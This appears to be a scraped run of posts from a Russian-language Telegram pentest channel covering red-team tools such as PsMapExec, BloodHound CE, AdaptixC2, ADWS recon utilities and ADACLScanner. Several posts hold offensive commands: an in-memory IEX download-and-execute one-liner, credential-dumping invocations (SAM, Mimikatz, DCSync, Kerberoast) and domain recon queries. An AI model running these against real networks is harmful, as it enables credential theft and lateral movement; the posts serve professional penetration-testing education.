Отличный инструмент для пост эксплуатации в
UPD. Начиная с версии 0.6.0, PsMapExec больше не имеет каких-либо внешних зависимостей, кроме модуля Amnesiac.
PsMapExec теперь можно запускать в ограниченных средах, таких как экзаменационные лаборатории или машины CTF
Текущая поддержка методов (протоколов):
🔵 RDP🔵 SessionHunter🔵 SMB🔵 SMB Signing🔵 Spraying🔵 VNC🔵 WinRM🔵 WMI🔵 MSSQL🔵 Kerberoast
Реализованные модули:
🔵 Amnesiac - выполнение Amnesiac C2 пейлоадов🔵 ConsoleHistory - история в PowerShell🔵 Files - файлы в типичных директориях🔵 KerbDump - дамп Kerberos билетов🔵 eKeys - дамп ключей (Mimikatz)🔵 LogonPasswords - дамп logon passwords (Mimikatz)🔵 LSA - дамп LSA (Mimikatz)🔵 NTDS - реализация DCsync🔵 SAM - дамп SAM
Запуск из памяти:
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")Примеры:
# Текущий пользователь
PsMapExec -Targets All -Method [Method]
# С паролем
PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]
# С хешем
PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]
# С билетом
PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]
# Дамп SAM файла
PsMapExec -Targets DC.domain.local -Method SMB -Ticket [Base64-Ticket] -Module SAM
# Kerberoasting
PsMapExec -Method Kerberoast -ShowOutput
# Использование модулей
PsMapExec -Targets All -Method [Method] -Module [Module]
#soft #pentest #powershell #psmapexec #redteam #windows
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2 2 1
Все еще используете pip ? Тогда мы идем к вам!
Для себя, относительно недавно открыл сей прекрасный инструмент, пользоваться pipx и уже тем более pip более не предоставляется возможным 😅
Что же это такое ?
Это современный, сверхбыстрый менеджер пакетов и проектов для
Кто будет писать в лс с вопросами и там будет, что-то вроде
pip install ... буду Установка в
curl -LsSf https://astral.sh/uv/install.sh | sh
Установка в
powershell -ExecutionPolicy ByPass -c "irm https://astral.sh/uv/install.ps1 | iex"
Хотел было написать подробную заметку, но нашел уже готовую статью
#python #uvx #venv
Please open Telegram to view this post
VIEW IN TELEGRAM
HACKLIDO
Pentesting Active Directory - Part 5 | Lateral Movement, Privilege Escalation & Tools
Let’s learn about Lateral movement, privilege escalation and some amazing tools that you can add to your arsenal Introduction Once inside the network, t...
Ребят, нашел для вас неплохую подборку материалов по AD, да, местами используется устаревший софт, например crackmapexec, но база никуда не делась, все подробно и понятно, рекомендую к прочтению и освоению
Part 1 | Trees, Forest and Trust Relations
Part 2 | Access Control, Users, KRGBT, Golden ticket attack
Part 3 | Recon with AD Module, Bloodhound, PowerView & Adalanche
Part 4 | LLMNR Poisoning
Part 5 | Lateral Movement, Privilege Escalation & Tools
Part 6 | Domain persistence and cross forest attacks
Part 7 | Abusing Misconfigured Templates (ESC1)
#windows #activedirectory #pentest #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11 4
Хороший анализатор HTTP заголовков
В
sudo apt install humble
Использование:
python3 humble.py -u https://www.spacex.com
#humble #web #pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
Обновление инструмента для выявления связей и построения графов в
Отличный инструмент при пентесте
Для сбора информации используются коллекторы bloodhound-ce или SharpHound
UPD. Patch notes
Установка:
curl -L https://ghst.ly/getbhce | docker compose -f - up
https://localhost:8080/ui/login
Логин admin и сгенерированный пароль
Для обновления переходим в директорию с docker-compose.yml и запускаем:
docker compose pull && docker compose up
Сбор информации:
python3 bloodhound-python -u domain_user -p 'P@ss' -ns 10.0.0.1 -d contoso.com -c all --dns-tcp
Neo4j запросы:
# Domain Admins и время установки пароля
MATCH (g:Group) WHERE g.name =~ "(?i).*DOMAIN ADMINS.*" WITH g MATCH (g)<-
[r:MemberOf*1..]-(u) RETURN u.name AS User,
datetime({epochSeconds:toInteger(u.pwdlastset)}) as passwordLastSet, datetime({epochSeconds: toInteger(u.whencreated)}) AS dateCreated ORDER BY u.pwdlastset
# Сервисные УЗ, время установки пароля, дата создания
MATCH (u:User) WHERE u.hasspn=true AND (NOT u.name STARTS WITH 'KRBTGT') RETURN u.name
AS accountName, datetime({epochSeconds: toInteger(u.pwdlastset)}) AS passwordLastSet,
datetime({epochSeconds: toInteger(u.whencreated)}) AS dateCreated ORDER BY u.pwdlastset
# Пользователи и описание
MATCH (u:User) RETURN u.name as username, u.description as description
# Domain Admins или Administrators с сессией исключая DC
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH
COLLECT(c1.name) AS domainControllers
MATCH (n:User)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-512' OR
g.objectid ENDS WITH '-544'
MATCH p = (c:Computer)-[:HasSession]->(n) WHERE NOT c.name in domainControllers return
p
# Неограниченное делегирование исключая DC
MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH
COLLECT(c1.name) AS domainControllers
MATCH (c:Computer {unconstraineddelegation:true}) WHERE NOT c.name IN domainControllers
RETURN c
# Пользователи с ограниченным делегированием
MATCH p = ((u:User)-[r:AllowedToDelegate]->(c:Computer)) RETURN p
Подробный гайд:
ADCS атаки:
Ссылки:
#bloodhound #pentest #active_directory #soft #bhce
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7 2👍1 1
Не мое, орфография автора и прочее сохранено, за исключением пары слов, чтобы влезло в картинку
✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Adaptix Framework
AdaptixC2 v0.4 is out
https://github.com/Adaptix-Framework/AdaptixC2
* New Linux/MacOS "gopher" agent
* TCP/mTLS external listener for "gopher" agent
* New internal TCP listener for "beacon" agent
* Monitoring of "working time" and "exitdate" agent parameters
* Screenshot storage
More details in the changelog: https://adaptix-framework.gitbook.io/adaptix-framework/changelog/v0.3-greater-than-v0.4
https://github.com/Adaptix-Framework/AdaptixC2
* New Linux/MacOS "gopher" agent
* TCP/mTLS external listener for "gopher" agent
* New internal TCP listener for "beacon" agent
* Monitoring of "working time" and "exitdate" agent parameters
* Screenshot storage
More details in the changelog: https://adaptix-framework.gitbook.io/adaptix-framework/changelog/v0.3-greater-than-v0.4
🔥5 2 1
Улучшить эффективность, увеличить скорость работы в Windows терминале, а также повысить комфорт тоже возможно. Начнем с установки winget. Это пакетный менеджер, что-то типа APT'а, но попроще.
Скачиваем и устанавливаем winget, есть вариант установки через Windows App Store.
Также рекомендую поставить PowerShell 7
winget install --id Microsoft.WindowsTerminal -e
winget install JanDeDobbeleer.OhMyPosh -s winget
oh-my-posh font install
# Meslo
oh-my-posh font install meslo
CTRL + SHIFT + , ищем в json файле profiles, defaults и добавляем наш шрифт:"font":
{
"face": "MesloLGM Nerd Font"
}
oh-my-posh get shell
notepad $PROFILE
oh-my-posh init pwsh | Invoke-Expression
. $PROFILE
Install-Module -Name Terminal-Icons -Repository PSGallery
ls "$env:POSH_THEMES_PATH"
https://ohmyposh.dev/docs/themes
cd "$env:POSH_THEMES_PATH"
notepad $PROFILE
oh-my-posh init pwsh --config "$env:POSH_THEMES_PATH\jandedobbeleer.omp.json" | Invoke-Expression
Сохраняем, перезапускаем, проверяем.
Import-Module -Name Terminal-Icons
Set-PSReadLineKeyHandler -Key UpArrow -Function HistorySearchBackward
Set-PSReadLineKeyHandler -Key DownArrow -Function HistorySearchForward
Set-PSReadLineOption -HistoryNoDuplicates
Set-PSReadLineOption -MaximumHistoryCount 99999
Set-PSReadLineOption -HistorySaveStyle SaveIncrementally
oh-my-posh init pwsh --config "$env:POSH_THEMES_PATH/space.omp.json" | Invoke-Expression
📚 Oh My Posh Docs
#windowsterminal #ohmyposh #console #manual
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2
Forwarded from RedTeam brazzers (Миша)
Друзья, всем привет!
На повестке дня интересная тема — рекон через Active Directory Web Services. Вкратце , это такой built-in вариант работы с LDAP через протокол HTTP, работает поверх 9389 порта, а обмен сообщениями происходит с помощью различных MS*-протоколов: MS-WSTIM, WXFR, WSENUM, MS-WSDS, MS-ADDM, MS-ADCAP, MS-NMFMB, MS-WSMAN.
В этом посте я хотел бы подсветить некоторые инструменты, используемые для сбора и изменения информации (предоставляется полноценный доступ к LDAP) через протокол ADWS:
- SOAPHound - изначальный ресерч, который показал, как можно использовать SOAP-сообщения для работы с ADWS. Собирает данные в Bloodhound-понятном формате;
- SharpADWS - полноценная работа с LDAP, в том числе изменение данных, например, прописывание RBCD;
- ShadowHound - работа через powershell.
Однако что если мы работаем с Linux? В таком случае есть следующие инструменты:
- SoaPy - полноценная работа с LDAP, в том числе изменение данных;
- powerview.py - эта версия powerview имеет возможность работать поверх ADWS, причем этот функционал появился буквально на днях. Собственно, он на фотографии.
Отдельно хочу отметить, что инструмент PingCastle также использует ADWS.
Почитать подробнее можно в этих статьях:
- SOAPHound — tool to collect Active Directory data via ADWS ;
- SoaPy: Stealthy enumeration of Active Directory environments through ADWS ;
- ShadowHound: A SharpHound Alternative Using Native PowerShell;
- Pentesting Webservices with Net.TCP Binding - работа SOAPHound основывается на использовании Net.TCP Binding, в этой статье рассказывается про инструменты, которые могут упростить анализ, а также их можно использовать в ресерче.
На повестке дня интересная тема — рекон через Active Directory Web Services. Вкратце , это такой built-in вариант работы с LDAP через протокол HTTP, работает поверх 9389 порта, а обмен сообщениями происходит с помощью различных MS*-протоколов: MS-WSTIM, WXFR, WSENUM, MS-WSDS, MS-ADDM, MS-ADCAP, MS-NMFMB, MS-WSMAN.
В этом посте я хотел бы подсветить некоторые инструменты, используемые для сбора и изменения информации (предоставляется полноценный доступ к LDAP) через протокол ADWS:
- SOAPHound - изначальный ресерч, который показал, как можно использовать SOAP-сообщения для работы с ADWS. Собирает данные в Bloodhound-понятном формате;
- SharpADWS - полноценная работа с LDAP, в том числе изменение данных, например, прописывание RBCD;
- ShadowHound - работа через powershell.
Однако что если мы работаем с Linux? В таком случае есть следующие инструменты:
- SoaPy - полноценная работа с LDAP, в том числе изменение данных;
- powerview.py - эта версия powerview имеет возможность работать поверх ADWS, причем этот функционал появился буквально на днях. Собственно, он на фотографии.
Отдельно хочу отметить, что инструмент PingCastle также использует ADWS.
Почитать подробнее можно в этих статьях:
- SOAPHound — tool to collect Active Directory data via ADWS ;
- SoaPy: Stealthy enumeration of Active Directory environments through ADWS ;
- ShadowHound: A SharpHound Alternative Using Native PowerShell;
- Pentesting Webservices with Net.TCP Binding - работа SOAPHound основывается на использовании Net.TCP Binding, в этой статье рассказывается про инструменты, которые могут упростить анализ, а также их можно использовать в ресерче.
Start.iss.one
Forensics - Start.iss.one
A startpage with online resources about Forensics, created by Dillon Bowe.
Стартовая страница с инструментами и материалами по DFIR
Некоторые инструменты:
P.S.
Задать вопрос: @wh_feedback_bot
Чат: @whitehat_chat
#dfir #forensics
Please open Telegram to view this post
VIEW IN TELEGRAM
Хороший материал по AD от 0xStarlight
#windows #activedirectory #pentest #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8
Апдейт по итогам финала:
https://t.iss.one/standoff_365_chat/112425
#standoff
✈️ Whitehat Lab
Команда FR13NDS & RHACKERS уже получила слот на участие в Standoff 15 по результатам Standoff 14.
Команда FR13NDS TEAM, занявшая 2-е место в прошедших Международных Играх по Кибербезопасности, уже входит в состав FR13NDS & RHACKERS.
👉 Поэтому по итогам МИК слот на участие в Standoff 15 получает только команда LilCringe.
Поздравляем и ждем на главной арене! 💥
https://t.iss.one/standoff_365_chat/112425
#standoff
Please open Telegram to view this post
VIEW IN TELEGRAM
Инструмент для анализа и проектирования сетевой инфраструктуры. Будет полезен пентестерам, сетевым инженерам, системным администраторам.
Возможности:
Работа с веб-интерфейсом
Табличное представление данных
Экспорт данных
Скриншот веб-ресурса
Поиск ПО по узлам сети
Сканирование с использованием nmap, masscan и scapy
Парсинг pcap-файлов
Интеграция с search-vulns
Формирование отчёта по найденным уязвимостям
Поиск по SNMP
Построение карты сети
Поиск субдоменов через DNS
HTTP REST API
Установка и запуск:
sudo apt install ./setezor_<ver>.deb
# Переменные окружения
export SERVER_REST_URL=https://<ip/domain>:<port>
export SECRET_KEY=abcdef
# Сервер
setezor
# Агент
setezor -s -p <port>
#setezor #network
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5 1
Telegram
Волосатый бублик
#htb
[ HackTheBox Machines Interactive ]
0xdf built a page for all HackTheBox machines. Filter on difficulty, OS, tags, and/or name. Mark complete or incomplete and filter on that (stored in browser local storage).
https://0xdf.gitlab.io/cheatsheets/htb…
[ HackTheBox Machines Interactive ]
0xdf built a page for all HackTheBox machines. Filter on difficulty, OS, tags, and/or name. Mark complete or incomplete and filter on that (stored in browser local storage).
https://0xdf.gitlab.io/cheatsheets/htb…
Кто хотел порешать
Отличный поисковик с удобными фильтрами от 0xdf
Мои можно порешать на HackerLab
Забрал отсюда - https://t.iss.one/hybgl/2093
#htb #windows #pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
Pentest Award - это ежегодная отраслевая премия для специалистов по тестированию на проникновение, которую уже третий год подряд организует компания Авилликс.
Здесь отмечают лучших специалистов страны, чьи находки и подходы двигают вперед всю отрасль кибербезопасности.
Почему стоит участвовать?
Участие бесплатное и открыто для всех. Можно подать как одну, так и несколько работ - ограничений нет.
Большое количество различных номинаций:
➡️ Пробив web➡️ Пробив инфраструктуры➡️ Мобильный разлом➡️ Девайс➡️ **ck the logic➡️ Раз bypass, два bypass➡️ Ловись рыбка➡️ Out of Scope
# Антиноминация➡️ Осторожно грабли
Дополнительные подарки: билеты на конференцию OFFZONE, гранты на обучение от CyberEd, призы от партнеров проекта.
Финалистов ждет закрытая церемония награждения 1 августа в Москве.
Как подать заявку?
Рассказать о интересном кейсе или проекте в свободной форме. Не нужно раскрывать эксплойты или детали, которые нельзя публиковать: важен подход, идея и вклад.
Можно анонимизировать любые детали, оставить только ник в Telegram для связи.
Подать заявку и узнать все подробности можно на сайте: https://award.awillix.ru/
Дедлайн - 30 июня!
Не упустите шанс заявить о себе, получить признание и вдохновить коллег. Ваш опыт точно найдет отклик!
#award #pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
Инструмент для аудита разрешений в
доступом (ACL – Access Control List)
Написан на
SACL - список используемый для аудита доступа к данному объекту.
DACL - список указывающий права пользователей и групп на действия с данным объектом.
Разрешения, которые нам интересны
GenericAll - полные права на объект
GenericWrite - редактировать атрибуты объекта
WriteOwner - изменить владельца объекта
WriteDACL - редактировать ACE объекта
AllExtendedRights - расширенные права на объект
ForceChangePassword - сменить пароль объекта
Self - возможность добавить себя в группу
Работает в GUI или консольном режимах:
Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/canix1/ADACLScanner/refs/heads/master/ADACLScan.ps1' -OutFile ADACLScan.ps1
.\ADACLScan.ps1
.\ADACLScan.ps1 -Base (Get-ADRootDSE).defaultNamingContext -Owner -Scope subtree -Filter '(objectClass=*)' | Where-Object {$_.Access -eq 'Owner'}
Экспорт в xls, csv, html
Большое количество возможностей
#adaclscanner #powershell #redteam #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2 1
Ресурс с интерактивными примерами эксплуатации веб уязвимостей. Также указаны методы противодействия, подойдет новичкам.
Различные темы, от классических sqli, xss, xxe и т.д. до LLM Prompt Injection
#web #pentest
Please open Telegram to view this post
VIEW IN TELEGRAM